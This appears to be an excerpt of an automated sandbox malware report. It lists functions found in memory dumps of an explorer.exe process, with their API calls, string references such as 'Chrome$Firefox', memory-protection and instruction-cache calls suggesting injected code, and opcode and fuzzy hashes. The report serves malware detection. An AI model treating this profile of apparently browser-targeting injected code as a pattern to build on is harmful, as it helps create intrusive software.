                                                                                                                                                                                                                                  • String ID: Chrome$Firefox
                                                                                                                                                                                                                                  • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                                  • Opcode ID: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                                  • Instruction ID: 0483ca06228e273a12066d292f1e5e9c6971b8d658bdcb0a41be8ff3a473a5ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE07E79511F05D5EA00DB50FC993C42368F768704FD10252D8894A374AFFC81DA8751
                                                                                                                                                                                                                                  Function 0E0E5590 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1128592954-0
                                                                                                                                                                                                                                  • Opcode ID: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                                  • Instruction ID: 2b7d5613f7bc3f1df02e983cc452c124b65907bd869f83def702b5467c08ec6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD018636B2A79082DE948B16F95436AA791EB4CFC0F4859B4EF5E57F18DE3CD4818B00
                                                                                                                                                                                                                                  Function 0DF35590 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1128592954-0
                                                                                                                                                                                                                                  • Opcode ID: 349cf744cf77672f3add2f0737221b0cd4b513aa9c04065f38322893ec6cefa6
                                                                                                                                                                                                                                  • Instruction ID: 46956f89a55d8fd4a4d4699b59b171b9f2821ce21e8b1811f78966c68f137666
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 349cf744cf77672f3add2f0737221b0cd4b513aa9c04065f38322893ec6cefa6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD01D62272A79182DE948B5AB94433AA391EB4CFC0F188135DE4F43F58DE2CD441C700
                                                                                                                                                                                                                                  Function 10205590 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1128592954-0
                                                                                                                                                                                                                                  • Opcode ID: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                                  • Instruction ID: 5188989b5061e00d5733016fa7f2dfd4960f4914aa96f97f1a36754f1edca699
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F01D63272679182EA548B17B99835AA7A1FB4CFC0F585570EE8E47B18EE3CD4818700
                                                                                                                                                                                                                                  Function 0E0D4A60 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1632192098-0
                                                                                                                                                                                                                                  • Opcode ID: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                                  • Instruction ID: b9ab6a99413a35d6274a2d0588812c58342996ddf68fe6b056beb9dd51a752ac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB610A3230C7C486DBA18B66E4543AE7BA0F3457C4F895625DFAA07791DB3DC889C700
                                                                                                                                                                                                                                  Function 0DF24A60 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1632192098-0
                                                                                                                                                                                                                                  • Opcode ID: 2d31757a24e125fede570ebb8f7bcb9f899faaf7790c6e5d89f683251c597ffe
                                                                                                                                                                                                                                  • Instruction ID: cc72ae36e8669384f006a0612a234867fa515fcdfcb1ed3c354a6d8ad6529f13
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d31757a24e125fede570ebb8f7bcb9f899faaf7790c6e5d89f683251c597ffe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B61E623748AA086DB22CF6DE85437A7B64F3A5B84F4AC226CF5B07791DEADC441C710
                                                                                                                                                                                                                                  Function 101F4A60 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1632192098-0
                                                                                                                                                                                                                                  • Opcode ID: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                                  • Instruction ID: db15245a55735894ea232cbf1598bac93006e0efb6b2dc966fb1e653c7a35bd5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C614432389B8887EB11CB65E8A435A7B60F385BD4F5A5226DF9A07791DE3DC489C310
                                                                                                                                                                                                                                  Function 08A0C5B5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 08A0C5CE
                                                                                                                                                                                                                                    • Part of subcall function 08A2BF69: _lock.LIBCMT ref: 08A2BF7B
                                                                                                                                                                                                                                    • Part of subcall function 08A0DE25: std::_Lockit::_Lockit.LIBCPMT ref: 08A0DE3B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 08A0C633
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 08A0C661
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 08A0C672
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1776536810-0
                                                                                                                                                                                                                                  • Opcode ID: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                                  • Instruction ID: 0f353ca704a2564a95b6f94ba4949ed4864237e3d90505838de5e088719336be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F11D631618F5C8F8B55EB2CD494B6A73E1FBAC322F40461E904AC33A4DE74D801CB81
                                                                                                                                                                                                                                  Function 08A0C685 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 08A0C69E
                                                                                                                                                                                                                                    • Part of subcall function 08A2BF69: _lock.LIBCMT ref: 08A2BF7B
                                                                                                                                                                                                                                    • Part of subcall function 08A0DE25: std::_Lockit::_Lockit.LIBCPMT ref: 08A0DE3B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 08A0C703
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 08A0C731
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 08A0C742
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1776536810-0
                                                                                                                                                                                                                                  • Opcode ID: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                                  • Instruction ID: 04c587c3050dc5e750591ffa03203ec816a4d51b355f325e5f626e832fb181ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C11B435618F1C8F8B95EB2CD494B6A73E1FBA8311B40472E904AC37A4EE74D901CB81
                                                                                                                                                                                                                                  Function 0AE3C685 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0AE3C69E
                                                                                                                                                                                                                                    • Part of subcall function 0AE5BF69: _lock.LIBCMT ref: 0AE5BF7B
                                                                                                                                                                                                                                    • Part of subcall function 0AE3DE25: std::_Lockit::_Lockit.LIBCPMT ref: 0AE3DE3B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0AE3C703
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0AE3C731
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0AE3C742
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1776536810-0
                                                                                                                                                                                                                                  • Opcode ID: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                                  • Instruction ID: fd2ce470353464f529b3dd1c97e7132193d4c3e9bc0925b86198d7498e865933
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F911A232218F0C4F8B95EF68D498A6A77E1FBEC240B14562AD00AD3265EE74D905CB81
                                                                                                                                                                                                                                  Function 0AE3C5B5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0AE3C5CE
                                                                                                                                                                                                                                    • Part of subcall function 0AE5BF69: _lock.LIBCMT ref: 0AE5BF7B
                                                                                                                                                                                                                                    • Part of subcall function 0AE3DE25: std::_Lockit::_Lockit.LIBCPMT ref: 0AE3DE3B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0AE3C633
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0AE3C661
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0AE3C672
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1776536810-0
                                                                                                                                                                                                                                  • Opcode ID: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                                  • Instruction ID: a54acf307d988117e36ef85ed4fba24ee3bf468cca19fdbeb3f59f7c53b71aa6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A11AF32218F0C4F8B85EF69D898A6A73E1FBEC310F14562AD04AD3365DE74D845CB81
                                                                                                                                                                                                                                  Function 0B2FC685 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0B2FC69E
                                                                                                                                                                                                                                    • Part of subcall function 0B31BF69: _lock.LIBCMT ref: 0B31BF7B
                                                                                                                                                                                                                                    • Part of subcall function 0B2FDE25: std::_Lockit::_Lockit.LIBCPMT ref: 0B2FDE3B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0B2FC703
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0B2FC731
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0B2FC742
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1776536810-0
                                                                                                                                                                                                                                  • Opcode ID: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                                  • Instruction ID: 0bb8c06eb0c7812d15b0c51f7bc41d475b623ca55867b7098b5103ec9447b33b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1118731628F0D4F8B59EB1CC49466BB7E5FB98350B504A2DA04AC3364EE74D905C741
                                                                                                                                                                                                                                  Function 0B2FC5B5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0B2FC5CE
                                                                                                                                                                                                                                    • Part of subcall function 0B31BF69: _lock.LIBCMT ref: 0B31BF7B
                                                                                                                                                                                                                                    • Part of subcall function 0B2FDE25: std::_Lockit::_Lockit.LIBCPMT ref: 0B2FDE3B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0B2FC633
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0B2FC661
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0B2FC672
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1776536810-0
                                                                                                                                                                                                                                  • Opcode ID: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                                  • Instruction ID: f06a215e71e80c820f6b4e696dd4bc461db6e29422c6b58e321204c018754ea9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73118431628F0D4F8B49EB6CC49496AB7E1FB9C350B504A2A914AD33A4EE74D905C781
                                                                                                                                                                                                                                  Function 0E0D8500 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4115577372-0
                                                                                                                                                                                                                                  • Opcode ID: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                                  • Instruction ID: 85f7670879b75cc540fdccc5dbac6dc859f1706a5ea330f516ba903d230fce96
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E31D1B22187C186C7298F36E94036D7BA0F749FC8F488216EF954778ACB2CD865C754
                                                                                                                                                                                                                                  Function 101F8500 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4115577372-0
                                                                                                                                                                                                                                  • Opcode ID: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                                  • Instruction ID: c84df2638a7ca69f0fb0a6ff63747e5feaa239055854853408d39853c8cf6aa8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5531DDB22186D08BC7108F35EA443A97B60F35AF88F498216EFD84B7AACB3CD455C754
                                                                                                                                                                                                                                  Function 08A1D971 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 08A1D98E
                                                                                                                                                                                                                                    • Part of subcall function 08A24485: _FindPESection.LIBCMT ref: 08A244AE
                                                                                                                                                                                                                                  • _initp_misc_cfltcvt_tab.LIBCMT ref: 08A1D99F
                                                                                                                                                                                                                                  • _initterm_e.LIBCMT ref: 08A1D9B2
                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 08A1D9FB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1991439119-0
                                                                                                                                                                                                                                  • Opcode ID: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                                  • Instruction ID: cdb6eaa595407064f8555e6f7c33560a2d791d2e89032ec97da5991173186a86
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B11E131218E188FEF28EF24EC847EA33A5FB54342B58892DC403C2964EF389545CA44
                                                                                                                                                                                                                                  Function 0AE4D971 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0AE4D98E
                                                                                                                                                                                                                                    • Part of subcall function 0AE54485: _FindPESection.LIBCMT ref: 0AE544AE
                                                                                                                                                                                                                                  • _initp_misc_cfltcvt_tab.LIBCMT ref: 0AE4D99F
                                                                                                                                                                                                                                  • _initterm_e.LIBCMT ref: 0AE4D9B2
                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0AE4D9FB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1991439119-0
                                                                                                                                                                                                                                  • Opcode ID: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                                  • Instruction ID: dd4c9bc58a4f23abcf3bf5be4e6d7172a308b10632681f3760d4b857c23b34ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D11A530224A098BEB29EF74FCD87EA33A9FB54344B59A926C503C21A5FE78D545CB41
                                                                                                                                                                                                                                  Function 0B30D971 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0B30D98E
                                                                                                                                                                                                                                    • Part of subcall function 0B314485: _FindPESection.LIBCMT ref: 0B3144AE
